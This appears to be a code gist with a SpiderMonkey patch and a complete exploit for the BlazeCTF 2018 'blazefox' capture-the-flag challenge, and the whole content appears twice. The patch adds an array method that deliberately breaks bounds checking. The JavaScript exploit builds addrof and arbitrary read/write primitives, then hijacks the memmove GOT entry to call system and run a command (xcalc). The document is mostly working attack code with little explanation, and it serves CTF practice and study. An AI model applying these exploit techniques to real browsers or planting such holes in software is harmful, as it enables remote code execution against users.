anvbis/blaze.diff

## blaze.diff
diff --git a/js/src/builtin/Array.cpp b/js/src/builtin/Array.cpp
index 2b6d8953c523..fa60ef14f1ec 100644
--- a/js/src/builtin/Array.cpp
+++ b/js/src/builtin/Array.cpp
@@ -206,6 +206,20 @@ bool js::GetLengthProperty(JSContext* cx, HandleObject obj, uint64_t* lengthp) {
   return ToLength(cx, value, lengthp);
 }

+static MOZ_ALWAYS_INLINE bool BlazeSetLengthProperty(JSContext* cx,
+                                                     HandleObject obj,
+                                                     uint64_t length) {
+  if (obj->is<ArrayObject>()) {
+    obj->as<ArrayObject>().setLength(length);
+    obj->as<ArrayObject>().setCapacity(length);
+    obj->as<ArrayObject>().setInitializedLength(length);
+
+    return true;
+  }
+
+  return false;
+}
+
 // Fast path for array functions where the object is expected to be an array.
 static MOZ_ALWAYS_INLINE bool GetLengthPropertyInlined(JSContext* cx,
                                                        HandleObject obj,
@@ -1570,6 +1584,22 @@ static DenseElementResult ArrayReverseDenseKernel(JSContext* cx,
   return DenseElementResult::Success;
 }

+static bool array_blaze(JSContext* cx, unsigned argc, Value* vp) {
+  CallArgs args = CallArgsFromVp(argc, vp);
+
+  RootedObject obj(cx, ToObject(cx, args.thisv()));
+  if (!obj) {
+    return false;
+  }
+
+  if (!BlazeSetLengthProperty(cx, obj, 420)) {
+    return false;
+  }
+
+  args.rval().setObject(*obj);
+  return true;
+}
+
 // ES2017 draft rev 1b0184bc17fc09a8ddcf4aeec9b6d9fcac4eafce
 // 22.1.3.21 Array.prototype.reverse ( )
 static bool array_reverse(JSContext* cx, unsigned argc, Value* vp) {
@@ -4608,6 +4638,8 @@ static const JSFunctionSpec array_methods[] = {
     JS_FN("unshift", array_unshift, 1, 0),
     JS_FNINFO("splice", array_splice, &array_splice_info, 2, 0),

+    JS_FN("blaze", array_blaze, 0, 0),
+
     /* Pythonic sequence methods. */
     JS_SELF_HOSTED_FN("concat", "ArrayConcat", 1, 0),
     JS_INLINABLE_FN("slice", array_slice, 2, 0, ArraySlice),
diff --git a/js/src/vm/ArrayObject.h b/js/src/vm/ArrayObject.h
index 9b9f2651d3da..2b01811ce59e 100644
--- a/js/src/vm/ArrayObject.h
+++ b/js/src/vm/ArrayObject.h
@@ -41,6 +41,14 @@ class ArrayObject : public NativeObject {
     getElementsHeader()->length = length;
   }

+  void setCapacity(uint32_t length) {
+    getElementsHeader()->capacity = length;
+  }
+
+  void setInitializedLength(uint32_t length) {
+    getElementsHeader()->initializedLength = length;
+  }
+
   // Make an array object with the specified initial state.
   static MOZ_ALWAYS_INLINE ArrayObject* create(
       JSContext* cx, gc::AllocKind kind, gc::InitialHeap heap,

## blazefox-2022.js
/*
BlazeCTF 2018 'blazefox' challenge.

Re-implemented in Spidermonkey on 12/2022.

hg checkout fa56acd185ad
hg import blaze.diff --no-commit
*/

let buf = new ArrayBuffer(8);
let f64 = new Float64Array(buf);
let i64 = new BigUint64Array(buf);

const ftoi = x => {
  f64[0] = x;
  return i64[0];
};

const itof = x => {
  i64[0] = x;
  return f64[0];
};

let oob = new Array(1.1, 2.2, 3.3);
let rdw = new BigUint64Array(1);             /* rdw.data_slot @ oob[13] */
let obj = new Array({a: 1}, {b: 2}, {c: 3}); /* obj.elements  @ oob[21] */

oob.blaze();

/* addrof primitive */
const addrof = o => {
  let tmp = oob[13];
  oob[13] = oob[21];

  obj[0] = o;
  let ret = rdw[0] & 0xffffffffffffn;

  oob[13] = tmp;
  return ret;
};

/* arbitrary 64-bit read */
const read = p => {
  let tmp = oob[13];
  oob[13] = itof(p);

  let ret = rdw[0];
  oob[13] = tmp;
  return ret;
};

/* arbitrary 64-bit write */
const write = (p, x) => {
  let tmp = oob[13];
  oob[13] = itof(p);

  rdw[0] = x;
  oob[13] = tmp;
};

let elf = read(addrof(oob) + 8n) - 0x245e98n;

let got = {
  memmove: elf + 0x23d7400n,
  system:  elf + 0x23d7190n
};

let system = read(got.system);
write(got.memmove, system);

let pwn = new Uint8Array(32);
let cmd = '/usr/bin/xcalc';

for (let i = 0; i < cmd.length; i++)
  pwn[i] = cmd.charCodeAt(i);

pwn.copyWithin(0, 16);
	diff --git a/js/src/builtin/Array.cpp b/js/src/builtin/Array.cpp
	index 2b6d8953c523..fa60ef14f1ec 100644
	--- a/js/src/builtin/Array.cpp
	+++ b/js/src/builtin/Array.cpp
	@@ -206,6 +206,20 @@ bool js::GetLengthProperty(JSContext* cx, HandleObject obj, uint64_t* lengthp) {
	return ToLength(cx, value, lengthp);
	}

	+static MOZ_ALWAYS_INLINE bool BlazeSetLengthProperty(JSContext* cx,
	+ HandleObject obj,
	+ uint64_t length) {
	+ if (obj->is<ArrayObject>()) {
	+ obj->as<ArrayObject>().setLength(length);
	+ obj->as<ArrayObject>().setCapacity(length);
	+ obj->as<ArrayObject>().setInitializedLength(length);
	+
	+ return true;
	+ }
	+
	+ return false;
	+}
	+
	// Fast path for array functions where the object is expected to be an array.
	static MOZ_ALWAYS_INLINE bool GetLengthPropertyInlined(JSContext* cx,
	HandleObject obj,
	@@ -1570,6 +1584,22 @@ static DenseElementResult ArrayReverseDenseKernel(JSContext* cx,
	return DenseElementResult::Success;
	}

	+static bool array_blaze(JSContext* cx, unsigned argc, Value* vp) {
	+ CallArgs args = CallArgsFromVp(argc, vp);
	+
	+ RootedObject obj(cx, ToObject(cx, args.thisv()));
	+ if (!obj) {
	+ return false;
	+ }
	+
	+ if (!BlazeSetLengthProperty(cx, obj, 420)) {
	+ return false;
	+ }
	+
	+ args.rval().setObject(*obj);
	+ return true;
	+}
	+
	// ES2017 draft rev 1b0184bc17fc09a8ddcf4aeec9b6d9fcac4eafce
	// 22.1.3.21 Array.prototype.reverse ( )
	static bool array_reverse(JSContext* cx, unsigned argc, Value* vp) {
	@@ -4608,6 +4638,8 @@ static const JSFunctionSpec array_methods[] = {
	JS_FN("unshift", array_unshift, 1, 0),
	JS_FNINFO("splice", array_splice, &array_splice_info, 2, 0),

	+ JS_FN("blaze", array_blaze, 0, 0),
	+
	/* Pythonic sequence methods. */
	JS_SELF_HOSTED_FN("concat", "ArrayConcat", 1, 0),
	JS_INLINABLE_FN("slice", array_slice, 2, 0, ArraySlice),
	diff --git a/js/src/vm/ArrayObject.h b/js/src/vm/ArrayObject.h
	index 9b9f2651d3da..2b01811ce59e 100644
	--- a/js/src/vm/ArrayObject.h
	+++ b/js/src/vm/ArrayObject.h
	@@ -41,6 +41,14 @@ class ArrayObject : public NativeObject {
	getElementsHeader()->length = length;
	}

	+ void setCapacity(uint32_t length) {
	+ getElementsHeader()->capacity = length;
	+ }
	+
	+ void setInitializedLength(uint32_t length) {
	+ getElementsHeader()->initializedLength = length;
	+ }
	+
	// Make an array object with the specified initial state.
	static MOZ_ALWAYS_INLINE ArrayObject* create(
	JSContext* cx, gc::AllocKind kind, gc::InitialHeap heap,
	/*
	BlazeCTF 2018 'blazefox' challenge.

	Re-implemented in Spidermonkey on 12/2022.

	hg checkout fa56acd185ad
	hg import blaze.diff --no-commit
	*/

	let buf = new ArrayBuffer(8);
	let f64 = new Float64Array(buf);
	let i64 = new BigUint64Array(buf);

	const ftoi = x => {
	f64[0] = x;
	return i64[0];
	};

	const itof = x => {
	i64[0] = x;
	return f64[0];
	};

	let oob = new Array(1.1, 2.2, 3.3);
	let rdw = new BigUint64Array(1); /* rdw.data_slot @ oob[13] */
	let obj = new Array({a: 1}, {b: 2}, {c: 3}); /* obj.elements @ oob[21] */

	oob.blaze();

	/* addrof primitive */
	const addrof = o => {
	let tmp = oob[13];
	oob[13] = oob[21];

	obj[0] = o;
	let ret = rdw[0] & 0xffffffffffffn;

	oob[13] = tmp;
	return ret;
	};

	/* arbitrary 64-bit read */
	const read = p => {
	let tmp = oob[13];
	oob[13] = itof(p);

	let ret = rdw[0];
	oob[13] = tmp;
	return ret;
	};

	/* arbitrary 64-bit write */
	const write = (p, x) => {
	let tmp = oob[13];
	oob[13] = itof(p);

	rdw[0] = x;
	oob[13] = tmp;
	};

	let elf = read(addrof(oob) + 8n) - 0x245e98n;

	let got = {
	memmove: elf + 0x23d7400n,
	system: elf + 0x23d7190n
	};

	let system = read(got.system);
	write(got.memmove, system);

	let pwn = new Uint8Array(32);
	let cmd = '/usr/bin/xcalc';

	for (let i = 0; i < cmd.length; i++)
	pwn[i] = cmd.charCodeAt(i);

	pwn.copyWithin(0, 16);